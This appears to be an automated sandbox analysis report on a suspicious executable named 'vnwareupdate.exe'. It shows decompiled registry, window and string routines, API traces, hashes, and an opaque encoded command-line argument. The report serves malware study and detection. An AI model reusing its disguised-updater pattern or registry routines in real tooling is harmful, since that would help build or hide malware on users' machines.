				char _v272;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E00405E26(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402BCD(__eflags, _v8,  &_v272, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406338(3);
					if(_t27 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}

0x00402bd8
0x00402be1
0x00402bea
0x00402bf6
0x00402bfd
0x00402c21
0x00402c07
0x00402c09
0x00402c5c
0x00000000
0x00402c62
0x00402c18
0x00402c1d
0x00402c1f
0x00000000
0x00000000
0x00402c1f
0x00402c3b
0x00402c43
0x00402c4a
0x00000000
0x00402c6f
0x00000000
0x00402c55
0x00402c79

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
Opcode Fuzzy Hash: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402CFF, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402CFF(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x421428; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f410;
						if(_t2 >  *0x42f410) {
							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C7C, 0);
							 *0x421428 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406374(0);
					}
				} else {
					_t6 =  *0x421428; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x421428 = 0;
					return _t6;
				}
			}

0x00402d06
0x00402d20
0x00402d26
0x00402d30
0x00402d36
0x00402d3c
0x00402d4d
0x00402d56
0x00000000
0x00402d5b
0x00402d62
0x00402d28
0x00402d2f
0x00402d2f
0x00402d08
0x00402d08
0x00402d0f
0x00402d12
0x00402d12
0x00402d18
0x00402d1f
0x00402d1f

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040503B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040503B(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a85c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a85c = _t16;
							E00404A12();
						}
						L11:
						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404992(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040408B(0x413);
				return 0;
			}

0x0040503f
0x00405049
0x00405065
0x00405087
0x0040508a
0x00405090
0x0040509a
0x0040509b
0x0040509d
0x004050a3
0x004050a3
0x004050ad
0x00000000
0x004050bb
0x00405072
0x004050aa
0x004050aa
0x00000000
0x004050aa
0x0040507e
0x00405080
0x00000000
0x00405080
0x0040504f
0x00000000
0x00000000
0x00405056
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040506A
CallWindowProcA.USER32 ref: 004050BB

Part of subcall function 0040408B: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040409D

Strings

, xrefs: 0040504B

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E87, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405E87(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405E26(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405e95
0x00405e97
0x00405eaf
0x00405eb4
0x00405eb9
0x00405ef6
0x00405ef6
0x00405ebb
0x00405ecd
0x00405ed8
0x00405ede
0x00405ee8
0x00000000
0x00000000
0x00405ee8
0x00405efb

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,0042A050,?,?,?,00000002,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,004060CB,80000002), ref: 00405ECD
RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,0042A050), ref: 00405ED8

Strings

"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 00405E8A, 00405EBE

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD
API String ID: 3356406503-228375716
Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403739, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403739() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429834; // 0x0
				_t3 = E0040371E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429834 =  *0x429834 & 0x00000000;
				return _t3;
			}

0x0040373a
0x00403742
0x00403749
0x0040374c
0x0040374c
0x0040374e
0x00403753
0x0040375a
0x00403760
0x00403764
0x00403765
0x0040376d

APIs

FreeLibrary.KERNEL32(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
GlobalFree.KERNEL32 ref: 0040375A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403739

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3916508600
Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040597F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040597F(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405980
0x0040598a
0x0040598c
0x00405993
0x0040599b
0x00000000
0x00000000
0x00000000
0x0040599b
0x0040599d
0x004059a2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GZe6EcSTpO.exe,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00405985
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GZe6EcSTpO.exe,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00405993

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405A9E, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A9E(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405aae
0x00405ab0
0x00405ab3
0x00405adf
0x00405ab8
0x00405ac1
0x00405ac6
0x00405ad1
0x00405ad4
0x00405af0
0x00405ad6
0x00405add
0x00000000
0x00405add
0x00405ae9
0x00405aed
0x00405aed
0x00405ae7
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AC6
CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vnwareupdate.exe PID: 2540 Parent PID: 5884 vnwareupdate.exeCOMMON

Executed Functions

Function 00401620, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

PyRun_SimpleStringFlags.PYTHON27(import syslib = sys.exec_prefix + '/lib'sys.path = [lib, lib + '/library.zip'],00000000), ref: 00401628
PyString_FromString.PYTHON27(__startup__), ref: 00401633
MessageBoxA.USER32 ref: 0040164F
Py_Finalize.PYTHON27 ref: 00401655
PyImport_Import.PYTHON27(00000000), ref: 00401662

Strings

Cannot create string for startup module name!, xrefs: 00401649
__startup__, xrefs: 0040162E
run, xrefs: 00401679
import syslib = sys.exec_prefix + '/lib'sys.path = [lib, lib + '/library.zip'], xrefs: 00401623
cx_Freeze Fatal Error, xrefs: 00401644

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: String$FinalizeFlagsFromImportImport_MessageRun_SimpleString_
String ID: Cannot create string for startup module name!$__startup__$cx_Freeze Fatal Error$import syslib = sys.exec_prefix + '/lib'sys.path = [lib, lib + '/library.zip']$run
API String ID: 2687168219-2139222109
Opcode ID: 9663f05e2a9afb517196e93200df147ac6d5f706011dd71c53766e286b3f306c
Instruction ID: f0eb5cab1673fe2c91a36ae365355747fd397ef4f218206fc0c31367421d9c04
Opcode Fuzzy Hash: 9663f05e2a9afb517196e93200df147ac6d5f706011dd71c53766e286b3f306c
Instruction Fuzzy Hash: 21213A716402019BC7105B64AE89B9B3798AB90332F350332FE11AA3E0D77DED52D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00401550, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 27windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\vnwareupdate.exe,00000101), ref: 0040155C
MessageBoxA.USER32 ref: 00401573
Py_Finalize.PYTHON27 ref: 00401579
PathRemoveFileSpecA.SHLWAPI(C:\Users\user\Desktop), ref: 0040159C

Strings

C:\Users\user\Desktop\vnwareupdate.exe, xrefs: 00401555, 0040158A
Unable to get executable name!, xrefs: 0040156D
C:\Users\user\Desktop, xrefs: 0040158F, 00401596
cx_Freeze Fatal Error, xrefs: 00401568

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: File$FinalizeMessageModuleNamePathRemoveSpec
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\vnwareupdate.exe$Unable to get executable name!$cx_Freeze Fatal Error
API String ID: 1653204619-1009327269
Opcode ID: ed879bc1adfc2792c8fabc3d0f277adf1026e57a9eee0d567e96abb8985161fc
Instruction ID: 934c2bf90c30bdb449cedede6eaa0f4cd5487040439067e37ce9f2aa0640e378
Opcode Fuzzy Hash: ed879bc1adfc2792c8fabc3d0f277adf1026e57a9eee0d567e96abb8985161fc
Instruction Fuzzy Hash: EAE04F3135030077D6109F64BE0EB8B2E9DBB45B23FA44532B645FA1E0C7FD8A40855C

Uniqueness

Uniqueness Score: -1.00%

Function 02C43A10, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00008000,00000000,02C439AE), ref: 02C43A19

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fdf7ddaf85d48df89a40da8c3bdf36ea475eba0d86ec3da10ee7539a37262575
Instruction ID: 73afae5e9271da1a14507b16a052ff6edd4bab8a641a2527626dfa44624ab4cc
Opcode Fuzzy Hash: fdf7ddaf85d48df89a40da8c3bdf36ea475eba0d86ec3da10ee7539a37262575
Instruction Fuzzy Hash: 77C02B73FD4B0106F3904A34CC07F0431502330B10FC04700B351CC2C0F9A840280500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02CA0380, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 244encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02CA03D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02CA03F7
GetLastError.KERNEL32 ref: 02CA042B
CryptAcquireContextW.ADVAPI32(F0000000,00000000,00000000,?,F0000000), ref: 02CA0460
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000001), ref: 02CA0499
GetLastError.KERNEL32 ref: 02CA04CD
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA04E2
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 02CA057C
GetLastError.KERNEL32 ref: 02CA05C2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA0633

Strings

Container name %s, len=%d, index=%d, flags=%d, xrefs: 02CA0590
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02CA0419, 02CA0482, 02CA04BB, 02CA0514, 02CA0540, 02CA05EA, 02CA061F
Enumerate bug: using workaround, xrefs: 02CA060B
Got max container len %d, xrefs: 02CA04F1
%lu. %s, xrefs: 02CA05B1
Listing containers CSP=%s, type = %d, xrefs: 02CA03A7

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
String ID: %lu. %s$..\..\openssl-1.1.0e\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
API String ID: 2639310310-608761734
Opcode ID: 93e8ef5e8665f11ad5e254340840a6daf2e7dbf069ba465248310372d19a9e15
Instruction ID: 8743765ab0b76718f323b56852371ce08cbe2fa1abcad6cf63676e31393547f2
Opcode Fuzzy Hash: 93e8ef5e8665f11ad5e254340840a6daf2e7dbf069ba465248310372d19a9e15
Instruction Fuzzy Hash: 9471D4B0F403157FEB109BA4AC99F6F7769EB80748F104818F905E7781EAB59A108BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0AA0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000004,00000001,00000001,?,?,00000000), ref: 02CA0B90
GetLastError.KERNEL32 ref: 02CA0BC4

Strings

capi_get_key, contname=%s, RSA_AES_CSP, xrefs: 02CA0AED
